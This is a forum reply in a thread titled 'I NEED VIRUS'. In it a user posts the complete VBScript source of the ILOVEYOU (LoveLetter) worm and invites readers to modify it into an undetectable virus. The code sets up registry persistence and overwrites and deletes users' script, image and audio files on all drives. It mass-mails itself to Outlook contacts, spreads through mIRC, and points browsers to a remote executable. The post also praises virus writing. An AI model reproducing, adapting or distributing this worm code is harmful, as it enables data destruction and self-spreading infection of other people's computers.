Search
Search titles only
By:
Search titles only
By:
Log in
Register
Search
Search titles only
By:
Search titles only
By:
Menu
Install the app
Install
Forums
New posts
All threads
Latest threads
New posts
Trending threads
Trending
Search forums
What's new
New posts
New ads
New profile posts
Latest activity
Free Ads
Latest reviews
Search ads
Members
Current visitors
New profile posts
Search profile posts
Contact us
Latest ads
Power Lifting Lever Belt
SkullVamp
Updated:
Saturday at 10:32 PM
Ad icon
port.lk Domain for sale
Lankan-Tech
Updated:
Saturday at 3:55 PM
Colombo
Kaduwela - Two Storey House for Sale
dilrasan
Updated:
Jun 11, 2026
Ad icon
Wechat qr verification
Pawan2005
Updated:
Jun 11, 2026
🚀 GOOGLE AI PRO 18 MONTHS ACTIVATION 🚀
sayuru bandara
Updated:
Jun 10, 2026
Electronics
Vehicles
Property
Search
Reply to thread
Forums
General
ElaKiri Help
I NEED VIRUS
Get the App
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Message
<blockquote data-quote="sanzilla jackcat" data-source="post: 3888490" data-attributes="member: 131221"><p>[code]e code balala vena eeva liyanna karana kattiyakuth innava thamai. eeth ithin eekata godak assembly language eka danagena inna epaaye.[/code]</p><p></p><p>first of all the assembly language is not the language for computer virology. But it's a vast used language. There are many features inside it.There is a worm called millisa worm that inflects to the M$ office world files. It did a huge damage all over the world. So it's nothing regarding asm a bit even. so the most important thing is the idea behind is. What are the new techiniques it will uses to inflect. What are the techiniques it will use to hide himself. encryption xor like things....</p><p></p><p></p><p>I will post the loveletter source code here ,,,, anyone can change this and make a perfect undetectable virus ,, so it's ups to you. Most of the sri lankan viruses are based on this original love letter.</p><p></p><p>[code]</p><p>[COLOR=#cccccc]rem barok -loveletter(vbe) <i hate go to school>[/COLOR] </p><p>[COLOR=#cccccc] rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines[/COLOR] </p><p> On Error Resume Next </p><p> dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow </p><p> eq="" </p><p> ctr=0 </p><p> Set fso = CreateObject("Scripting.FileSystemObject") </p><p> set file = fso.OpenTextFile(WScript.ScriptFullname,1) </p><p> vbscopy=file.ReadAll </p><p> main() </p><p> sub main() </p><p> On Error Resume Next </p><p> dim wscr,rr </p><p> set wscr=CreateObject("WScript.Shell") </p><p> rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout") </p><p> if (rr>=1) then </p><p> wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD" </p><p> end if </p><p> Set dirwin = fso.GetSpecialFolder(0) </p><p> Set dirsystem = fso.GetSpecialFolder(1) </p><p> Set dirtemp = fso.GetSpecialFolder(2) </p><p> Set c = fso.GetFile(WScript.ScriptFullName) </p><p> c.Copy(dirsystem&"\MSKernel32.vbs") </p><p> c.Copy(dirwin&"\Win32DLL.vbs") </p><p> c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") </p><p> regruns() </p><p> html() </p><p> spreadtoemail() </p><p> listadriv() </p><p> end sub </p><p> sub regruns() </p><p> On Error Resume Next </p><p> Dim num,downread </p><p> regcreate </p><p> "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKern el32",dirsystem&"\MSKernel32.vbs" </p><p> regcreate </p><p> "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunService s\Win32DLL",dirwin&"\Win32DLL.vbs" </p><p> downread="" </p><p> downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory") </p><p> if (downread="") then </p><p> downread="c:\" </p><p> end if </p><p> if (fileexist(dirsystem&"\WinFAT32.exe")=1) then </p><p> Randomize </p><p> num = Int((4 * Rnd) + 1) </p><p> if num = 1 then </p><p> regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start </p><p> Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfm </p><p> hPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe" </p><p> elseif num = 2 then </p><p> regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqw </p><p> erWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe" </p><p> elseif num = 3 then </p><p> regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start </p><p> Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBd </p><p> QZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe" </p><p> elseif num = 4 then </p><p> regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start </p><p> Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSD </p><p> GjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN -BUGSFIX.exe" </p><p> end if </p><p> end if </p><p> if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then regcreate </p><p> "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BU GSFIX",downread&"\WIN-BUGSFIX.exe" </p><p> regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet </p><p> Explorer\Main\Start Page","about:blank" </p><p> end if </p><p> end sub </p><p> sub listadriv </p><p> On Error Resume Next </p><p> Dim d,dc,s </p><p> Set dc = fso.Drives </p><p> For Each d in dc </p><p> If d.DriveType = 2 or d.DriveType=3 Then </p><p> folderlist(d.path&"\") </p><p> end if </p><p> Next </p><p> listadriv = s </p><p> end sub </p><p> sub infectfiles(folderspec) </p><p> On Error Resume Next </p><p> dim f,f1,fc,ext,ap,mircfname,s,bname,mp3 </p><p> set f = fso.GetFolder(folderspec) </p><p> set fc = f.Files </p><p> for each f1 in fc </p><p> ext=fso.GetExtensionName(f1.path) </p><p> ext=lcase(ext) </p><p> s=lcase(f1.name) </p><p> if (ext="vbs") or (ext="vbe") then </p><p> set ap=fso.OpenTextFile(f1.path,2,true) </p><p> ap.write vbscopy </p><p> ap.close </p><p> elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then </p><p> set ap=fso.OpenTextFile(f1.path,2,true) </p><p> ap.write vbscopy </p><p> ap.close </p><p> bname=fso.GetBaseName(f1.path) </p><p> set cop=fso.GetFile(f1.path) </p><p> cop.copy(folderspec&"\"&bname&".vbs") fso.DeleteFile(f1.path) </p><p> elseif(ext="jpg") or (ext="jpeg") then </p><p> set ap=fso.OpenTextFile(f1.path,2,true) </p><p> ap.write vbscopy </p><p> ap.close </p><p> set cop=fso.GetFile(f1.path) </p><p> cop.copy(f1.path&".vbs") </p><p> fso.DeleteFile(f1.path) </p><p> elseif(ext="mp3") or (ext="mp2") then </p><p> set mp3=fso.CreateTextFile(f1.path&".vbs") </p><p> mp3.write vbscopy </p><p> mp3.close </p><p> set att=fso.GetFile(f1.path) </p><p> att.attributes=att.attributes+2 </p><p> end if </p><p> if (eq<>folderspec) then </p><p> if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then </p><p> set scriptini=fso.CreateTextFile(folderspec&"\script.ini") scriptini.WriteLine "[script]" </p><p> scriptini.WriteLine ";mIRC Script" </p><p> scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will" </p><p> scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks" </p><p> scriptini.WriteLine ";" </p><p> scriptini.WriteLine ";Khaled Mardam-Bey" </p><p> scriptini.WriteLine ";http://www.mirc.com" </p><p> scriptini.WriteLine ";" </p><p> scriptini.WriteLine "n0=on 1:JOIN:#:{" </p><p> scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }" scriptini.WriteLine "n2= /.dcc send $nick </p><p> "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM" </p><p> scriptini.WriteLine "n3=}" </p><p> scriptini.close </p><p> eq=folderspec </p><p> end if </p><p> end if </p><p> next </p><p> end sub </p><p> sub folderlist(folderspec) </p><p> On Error Resume Next </p><p> dim f,f1,sf </p><p> set f = fso.GetFolder(folderspec) </p><p> set sf = f.SubFolders </p><p> for each f1 in sf </p><p> infectfiles(f1.path) </p><p> folderlist(f1.path) </p><p> next </p><p> end sub </p><p> sub regcreate(regkey,regvalue) </p><p> Set regedit = CreateObject("WScript.Shell") </p><p> regedit.RegWrite regkey,regvalue </p><p> end sub </p><p> function regget(value) </p><p> Set regedit = CreateObject("WScript.Shell") </p><p> regget=regedit.RegRead(value) </p><p> end function </p><p> function fileexist(filespec) </p><p> On Error Resume Next </p><p> dim msg </p><p> if (fso.FileExists(filespec)) Then </p><p> msg = 0 </p><p> else </p><p> msg = 1 </p><p> end if </p><p> fileexist = msg </p><p> end function </p><p> function folderexist(folderspec) </p><p> On Error Resume Next </p><p> dim msg </p><p> if (fso.GetFolderExists(folderspec)) then </p><p> msg = 0 </p><p> else </p><p> msg = 1 </p><p> end if </p><p> fileexist = msg </p><p> end function </p><p> sub spreadtoemail() </p><p> On Error Resume Next </p><p> dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad </p><p> set regedit=CreateObject("WScript.Shell") </p><p> set out=WScript.CreateObject("Outlook.Application") </p><p> set mapi=out.GetNameSpace("MAPI") </p><p> for ctrlists=1 to mapi.AddressLists.Count </p><p> set a=mapi.AddressLists(ctrlists) </p><p> x=1 </p><p> regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a) if (regv="") then </p><p> regv=1 </p><p> end if </p><p> if (int(a.AddressEntries.Count)>int(regv)) then </p><p> for ctrentries=1 to a.AddressEntries.Count </p><p> malead=a.AddressEntries(x) </p><p> regad="" </p><p> regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead ) </p><p> if (regad="") then </p><p> set male=out.CreateItem(0) </p><p> male.Recipients.Add(malead) </p><p> male.Subject = "ILOVEYOU" </p><p> male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me." </p><p> male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") male.Send </p><p> regedit.RegWrite </p><p> "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD" end if </p><p> x=x+1 </p><p> next </p><p> regedit.RegWrite </p><p> "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count else </p><p> regedit.RegWrite </p><p> "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count end if </p><p> next </p><p> Set out=Nothing </p><p> Set mapi=Nothing </p><p> end sub </p><p> sub html </p><p> On Error Resume Next </p><p> dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6 </p><p> dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - </p><p> LOVELETTER@-@>"&vbcrlf& _ "<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? </p><p> @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _ "<META NAME=@-@Description@-@ </p><p> CONTENT=@-@simple but i think this is good...@-@>"&vbcrlf& _ </p><p> "<?-?HEAD><BODY </p><p> ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU. </p><p> HTM#-#,#-#main#-#)@-@ "&vbcrlf& _ </p><p> "ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU. HTM#-#,#-#main#-#)@-@ </p><p> BGPROPERTIES=@-@fixed@-@ </p><p> BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _ </p><p> "<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>- Please press #-#YES#-# button to </p><p> Enable ActiveX<?-?p>"&vbcrlf& _ </p><p> "<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ </p><p> BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQU EE> "&vbcrlf& _ </p><p> "<?-?BODY><?-?HTML>"&vbcrlf& _ </p><p> "<SCRIPT language=@-@JScript@-@>"&vbcrlf& _ "<!--?-??-?"&vbcrlf& _ </p><p> "if (window.screen){var wi=screen.availWidth;var </p><p> hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrl f& _ </p><p> "?-??-?-->"&vbcrlf& _ </p><p> "<?-?SCRIPT>"&vbcrlf& _ </p><p> "<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _ "<!--"&vbcrlf& _ </p><p> "on error resume next"&vbcrlf& _ </p><p> "dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _ "aw=1"&vbcrlf& _ </p><p> "code=" </p><p> dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _ </p><p> "set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _ "code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _ </p><p> "code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _ "code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _ "set </p><p> wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _ </p><p> "wri.write code4"&vbcrlf& _ </p><p> "wri.close"&vbcrlf& _ </p><p> "if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _ "if (err.number=424) then"&vbcrlf& _ </p><p> "aw=0"&vbcrlf& _ </p><p> "end if"&vbcrlf& _ </p><p> "if (aw=1) then"&vbcrlf& _ </p><p> "document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _ "window.close"&vbcrlf& _ </p><p> "end if"&vbcrlf& _ </p><p> "end if"&vbcrlf& _ </p><p> "Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _ </p><p> "regedit.RegWrite </p><p> @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^ </p><p> -^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _ "?-??-?-->"&vbcrlf& _ </p><p> "<?-?SCRIPT>" </p><p> dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'") </p><p> dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""") dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/") </p><p> dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\") </p><p> dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'") </p><p> dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""") dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/") </p><p> dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\") </p><p> set fso=CreateObject("Scripting.FileSystemObject") </p><p> set c=fso.OpenTextFile(WScript.ScriptFullName,1) </p><p> lines=Split(c.ReadAll,vbcrlf) </p><p> l1=ubound(lines) </p><p> for n=0 to ubound(lines) </p><p> lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91)) lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93)) </p><p> lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37)) if (l1=n) then </p><p> lines(n)=chr(34)+lines(n)+chr(34) </p><p> else </p><p> lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _" end if </p><p> next </p><p> set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM") b.close </p><p> set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2) d.write dt5 </p><p> d.write join(lines,vbcrlf) </p><p> d.write vbcrlf </p><p> d.write dt6 </p><p> d.close </p><p> end sub</p><p>[/code]</p><p></p><p>so if you know vbs and you have a fresh idea , you are a good virus writer. Yes.</p><p></p><p>anyway did you guys heard about a virus that inflect the facebook accounts , it's actually a worm . It uses a XSS hole in the facebook</p><p>to execute the aribratary javascript code and inflect. It inflected to the huge number of facebook accounts. so computer viruses are not only limited to the desktop viruses. Think different and get an new idea is the most important thing as I feel.</p><p></p><p>anyway someone who wish to start explore the computer virology this book is good ...</p><p><a href="http://www.flazx.com/ebook2723.php" target="_blank">http://www.flazx.com/ebook2723.php</a></p><p></p><p><strong>Publisher</strong> Addison-Wesley <strong>Author(s)</strong> Peter Szor <strong>ISBN</strong> 0321304543</p><p>happy reading.</p></blockquote><p></p>
[QUOTE="sanzilla jackcat, post: 3888490, member: 131221"] [code]e code balala vena eeva liyanna karana kattiyakuth innava thamai. eeth ithin eekata godak assembly language eka danagena inna epaaye.[/code] first of all the assembly language is not the language for computer virology. But it's a vast used language. There are many features inside it.There is a worm called millisa worm that inflects to the M$ office world files. It did a huge damage all over the world. So it's nothing regarding asm a bit even. so the most important thing is the idea behind is. What are the new techiniques it will uses to inflect. What are the techiniques it will use to hide himself. encryption xor like things.... I will post the loveletter source code here ,,,, anyone can change this and make a perfect undetectable virus ,, so it's ups to you. Most of the sri lankan viruses are based on this original love letter. [code] [COLOR=#cccccc]rem barok -loveletter(vbe) <i hate go to school>[/COLOR] [COLOR=#cccccc] rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines[/COLOR] On Error Resume Next dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow eq="" ctr=0 Set fso = CreateObject("Scripting.FileSystemObject") set file = fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=file.ReadAll main() sub main() On Error Resume Next dim wscr,rr set wscr=CreateObject("WScript.Shell") rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout") if (rr>=1) then wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD" end if Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\MSKernel32.vbs") c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") regruns() html() spreadtoemail() listadriv() end sub sub regruns() On Error Resume Next Dim num,downread regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKern el32",dirsystem&"\MSKernel32.vbs" regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunService s\Win32DLL",dirwin&"\Win32DLL.vbs" downread="" downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory") if (downread="") then downread="c:\" end if if (fileexist(dirsystem&"\WinFAT32.exe")=1) then Randomize num = Int((4 * Rnd) + 1) if num = 1 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfm hPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe" elseif num = 2 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqw erWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe" elseif num = 3 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBd QZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe" elseif num = 4 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSD GjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN -BUGSFIX.exe" end if end if if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BU GSFIX",downread&"\WIN-BUGSFIX.exe" regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank" end if end sub sub listadriv On Error Resume Next Dim d,dc,s Set dc = fso.Drives For Each d in dc If d.DriveType = 2 or d.DriveType=3 Then folderlist(d.path&"\") end if Next listadriv = s end sub sub infectfiles(folderspec) On Error Resume Next dim f,f1,fc,ext,ap,mircfname,s,bname,mp3 set f = fso.GetFolder(folderspec) set fc = f.Files for each f1 in fc ext=fso.GetExtensionName(f1.path) ext=lcase(ext) s=lcase(f1.name) if (ext="vbs") or (ext="vbe") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close bname=fso.GetBaseName(f1.path) set cop=fso.GetFile(f1.path) cop.copy(folderspec&"\"&bname&".vbs") fso.DeleteFile(f1.path) elseif(ext="jpg") or (ext="jpeg") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close set cop=fso.GetFile(f1.path) cop.copy(f1.path&".vbs") fso.DeleteFile(f1.path) elseif(ext="mp3") or (ext="mp2") then set mp3=fso.CreateTextFile(f1.path&".vbs") mp3.write vbscopy mp3.close set att=fso.GetFile(f1.path) att.attributes=att.attributes+2 end if if (eq<>folderspec) then if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then set scriptini=fso.CreateTextFile(folderspec&"\script.ini") scriptini.WriteLine "[script]" scriptini.WriteLine ";mIRC Script" scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will" scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks" scriptini.WriteLine ";" scriptini.WriteLine ";Khaled Mardam-Bey" scriptini.WriteLine ";http://www.mirc.com" scriptini.WriteLine ";" scriptini.WriteLine "n0=on 1:JOIN:#:{" scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }" scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM" scriptini.WriteLine "n3=}" scriptini.close eq=folderspec end if end if next end sub sub folderlist(folderspec) On Error Resume Next dim f,f1,sf set f = fso.GetFolder(folderspec) set sf = f.SubFolders for each f1 in sf infectfiles(f1.path) folderlist(f1.path) next end sub sub regcreate(regkey,regvalue) Set regedit = CreateObject("WScript.Shell") regedit.RegWrite regkey,regvalue end sub function regget(value) Set regedit = CreateObject("WScript.Shell") regget=regedit.RegRead(value) end function function fileexist(filespec) On Error Resume Next dim msg if (fso.FileExists(filespec)) Then msg = 0 else msg = 1 end if fileexist = msg end function function folderexist(folderspec) On Error Resume Next dim msg if (fso.GetFolderExists(folderspec)) then msg = 0 else msg = 1 end if fileexist = msg end function sub spreadtoemail() On Error Resume Next dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad set regedit=CreateObject("WScript.Shell") set out=WScript.CreateObject("Outlook.Application") set mapi=out.GetNameSpace("MAPI") for ctrlists=1 to mapi.AddressLists.Count set a=mapi.AddressLists(ctrlists) x=1 regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a) if (regv="") then regv=1 end if if (int(a.AddressEntries.Count)>int(regv)) then for ctrentries=1 to a.AddressEntries.Count malead=a.AddressEntries(x) regad="" regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead ) if (regad="") then set male=out.CreateItem(0) male.Recipients.Add(malead) male.Subject = "ILOVEYOU" male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me." male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") male.Send regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD" end if x=x+1 next regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count else regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count end if next Set out=Nothing Set mapi=Nothing end sub sub html On Error Resume Next dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6 dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _ "<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _ "<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@>"&vbcrlf& _ "<?-?HEAD><BODY ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU. HTM#-#,#-#main#-#)@-@ "&vbcrlf& _ "ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU. HTM#-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _ "<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>- Please press #-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _ "<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQU EE> "&vbcrlf& _ "<?-?BODY><?-?HTML>"&vbcrlf& _ "<SCRIPT language=@-@JScript@-@>"&vbcrlf& _ "<!--?-??-?"&vbcrlf& _ "if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrl f& _ "?-??-?-->"&vbcrlf& _ "<?-?SCRIPT>"&vbcrlf& _ "<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _ "<!--"&vbcrlf& _ "on error resume next"&vbcrlf& _ "dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _ "aw=1"&vbcrlf& _ "code=" dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _ "set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _ "code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _ "code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _ "code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _ "set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _ "wri.write code4"&vbcrlf& _ "wri.close"&vbcrlf& _ "if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _ "if (err.number=424) then"&vbcrlf& _ "aw=0"&vbcrlf& _ "end if"&vbcrlf& _ "if (aw=1) then"&vbcrlf& _ "document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _ "window.close"&vbcrlf& _ "end if"&vbcrlf& _ "end if"&vbcrlf& _ "Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _ "regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^ -^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _ "?-??-?-->"&vbcrlf& _ "<?-?SCRIPT>" dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'") dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""") dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/") dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\") dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'") dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""") dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/") dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\") set fso=CreateObject("Scripting.FileSystemObject") set c=fso.OpenTextFile(WScript.ScriptFullName,1) lines=Split(c.ReadAll,vbcrlf) l1=ubound(lines) for n=0 to ubound(lines) lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91)) lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93)) lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37)) if (l1=n) then lines(n)=chr(34)+lines(n)+chr(34) else lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _" end if next set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM") b.close set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2) d.write dt5 d.write join(lines,vbcrlf) d.write vbcrlf d.write dt6 d.close end sub [/code] so if you know vbs and you have a fresh idea , you are a good virus writer. Yes. anyway did you guys heard about a virus that inflect the facebook accounts , it's actually a worm . It uses a XSS hole in the facebook to execute the aribratary javascript code and inflect. It inflected to the huge number of facebook accounts. so computer viruses are not only limited to the desktop viruses. Think different and get an new idea is the most important thing as I feel. anyway someone who wish to start explore the computer virology this book is good ... [url]http://www.flazx.com/ebook2723.php[/url] [B]Publisher[/B] Addison-Wesley [B]Author(s)[/B] Peter Szor 